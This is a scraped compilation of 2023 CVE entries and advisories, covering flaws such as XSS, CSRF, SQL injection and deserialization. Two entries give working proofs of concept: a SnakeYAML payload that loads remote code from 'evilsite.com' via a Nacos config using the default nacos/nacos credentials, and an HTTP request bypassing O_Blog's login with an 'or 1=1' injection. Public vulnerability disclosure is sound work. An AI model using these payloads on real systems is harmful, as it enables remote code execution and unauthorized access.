The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVE-2023-3936

An issue in Nacos Group Nacos Spring Project v.1.1.1 and before allows a remote attacker to execute arbitrary code via the SnakeYamls Constructor() component.

**Issue Description**

The SnakeYaml's Constructor() class is used in the component nacos-spring-context, but it does not restrict types that can be instantiated during deserialization.

**Describe what happened (or what feature you want)**

Deserializing yaml content provided by an attacker can lead to remote code execution.  
So when spring framework project uses nacos-spring-context as a dependency, It will be easily RCE by just adding evil config in nacos server.

**Describe what you expected to happen**

Unsupported YAML content.

**How to reproduce it (as minimally and precisely as possible)**

1.  Create a project of empty spring-framework, and add dependency of nacos-spring-context.
2.  Add codes below, as the document says, it setting NacosPropertySource:

    +import com.alibaba.nacos.api.config.ConfigType;
    +import com.alibaba.nacos.spring.context.annotation.config.NacosPropertySource;
    
     @SpringBootApplication
    +@NacosPropertySource(dataId = "example.yaml", type=ConfigType.YAML, autoRefreshed=true)
     public class Application {
    
            public static void main(String[] args) {
                  ......
    

3.  Now login to nacos config server(default at http://127.0.0.1:8848 with credential of nacos/nacos), then edit example.yaml, add one line of config below:

    test: !!javax.script.ScriptEngineManager  [ !!java.net.URLClassLoader  [[ !!java.net.URL  [ "http://evilsite.com" ]]]]
    

**Tell us your environment**

spring-framework 2.7.8  
nacos-spring-context 1.1.1

**Anything else we need to know?**

CVE-2023-39106: YAML deserialization vulnerability leads to RCE · Issue #314 · nacos-group/nacos-spring-project

SQL injection vulnerability in berkaygediz O_Blog v.1.0 allows a local attacker to escalate privileges via the secure_file_priv component.

SQL injection bypass login:  
POST /O\_Blog-main/ HTTP/1.1  
Host: 192.168.150.131  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
DNT: 1  
Cookie: PHPSESSID=9697cab5c5ac6b604b268d245e9a9519  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 47

eposta=2384693535@qq.com'or 1=1#&sifre=31232132

CVE-2023-38899: sql sql injection · Issue #2 · berkaygediz/O_Blog

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BUTTERFLY BUTTON PROJECT - BUTTERFLY BUTTON (Architecture) allows loss of plausible deniability, confidentiality.This issue affects BUTTERFLY BUTTON: As of 2023-08-21.



This site uses cookies from Google to deliver its services and to analyze traffic. Information about your use of this site is shared with Google. By using this site, you agree to its use of cookies.

Learn more

Got it

CVE-2023-40735: Advisories

An issue was discovered in kdmserver service in LeEco LeTV X43 version V2401RCN02C080080B04121S, allows attackers to execute arbitrary code, escalate privileges, and cause a denial of service (DoS).

CVE-2020-28715

Critters versions 0.0.17-0.0.19 have an issue when parsing the HTML, which leads to a potential cross-site scripting (XSS) bug. We recommend upgrading to version 0.0.20 of the extension. 

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Package**

npm critters (npm)

**Affected versions**

0.0.17-0.0.19

**Description**

**Impact**

Critters version 0.0.17-0.0.19 have an issue when parsing the HTML which leads to a potential cross-site scripting (XSS) bug.

**Patches**

The bug has been fixed in v0.0.20.

**Workarounds**

Upgrading Critters version to >0.0.20 is the easiest fix. This is a non breaking version upgrade so we recommend all users to use v0.0.20.

CVE-2023-3481: Critical CSS inlining XSS Vulnerability Advisory

Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 10.6.8.

CVE-2023-4453

Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.6.3.

Expand Up @@ -69,12 +69,17 @@ public function createClientAction(Request $request, EntityManagerInterface $ent /\*\* \* Remove a client. \* \* @Route("/developer/client/delete/{id}", requirements={"id" = "\\d+"}, name="developer\_delete\_client") \* @Route("/developer/client/delete/{id}", requirements={"id" = "\\d+"}, name="developer\_delete\_client", methods={"POST"}) \* \* @return RedirectResponse \*/ public function deleteClientAction(Client $client, EntityManagerInterface $entityManager, TranslatorInterface $translator) public function deleteClientAction(Request $request, Client $client, EntityManagerInterface $entityManager, TranslatorInterface $translator) {  
if (!$this\->isCsrfTokenValid('delete-client', $request\->request\->get('token'))) { throw $this\->createAccessDeniedException('Bad CSRF token.'); }  
if (null === $this\->getUser() || $client\->getUser()->getId() !== $this\->getUser()->getId()) { throw $this\->createAccessDeniedException('You can not access this client.'); } Expand Down

CVE-2023-4455: Merge pull request from GHSA-gjvc-55fw-v6vq · wallabag/wallabag@ffcc5c9

CVE-2023-4454

Cross-site scripting vulnerability in Advanced Custom Fields versions 6.1.0 to 6.1.7 and Advanced Custom Fields Pro versions 6.1.0 to 6.1.7 allows a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product with the administrative privilege.